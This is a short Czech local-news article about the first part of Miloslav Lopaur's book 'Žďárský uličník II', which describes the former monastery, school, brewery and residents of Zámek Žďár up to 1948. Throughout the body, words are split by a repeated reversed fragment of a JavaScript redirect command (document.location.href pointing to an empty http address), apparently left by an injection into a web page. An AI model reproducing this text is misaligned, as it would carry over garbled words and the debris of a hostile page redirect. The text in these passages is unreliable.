Rainbow page separator

První část Žďárského uličníku II popisuje někdejší klášter

Čtvrtek, 23. listopadu 2017

Žďár nad Sázavou / Mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topis někdejšího Zámku Žďár, dnes Žďáru nad Sázavou 2, mapuje nové pokračování knihy Žďárský uličník II/1 his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torika a muzejníka Miloslava Lopaura, na kterém s ním spolupracovali Jana Fuksová, Silvie Jagošová a Stanislav Mikule.
První díl „zámecké“ publikace, přičemž druhá část vyjde na jaře, líčí osudy někdejšího kláštera a klášterního hospodářství. „Poprvé je také podrobněji poodhalena podoba žďárského barokního školství, například gymnázia. Kniha je dovedena do roku 1948, takže se například dozvíte, kdo bydlel v někdejším klášteře v době, kdy zde bylo kolem šedesáti samostatných bytů, poznáte blíže osobnost obrozeneckého spisovatele Františka Turinského, vynálezce tašky síťovky Vavřína Krčila či učitele a hudebního skladatele An[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonína Rohlíka, podrobné dějiny zámeckého pivovaru, mlýnu či školy,“ nastínil některé zajímavosti Stanislav Mikule ze žďárského muzea.
Druhá část knihy vyjde na jaře a zmapuje zástavbu Zámku Žďáru. „Můžete se těšit na osudy obyvatel Tálského mlýna, his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii Starého i Nového dvora, zjistíte, jak vypadala Vápenice před svým za[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topením, jak vypadala Drůbežna a kudy vedla úzkorozchodná lesní dráha,“ doplnil Mikule.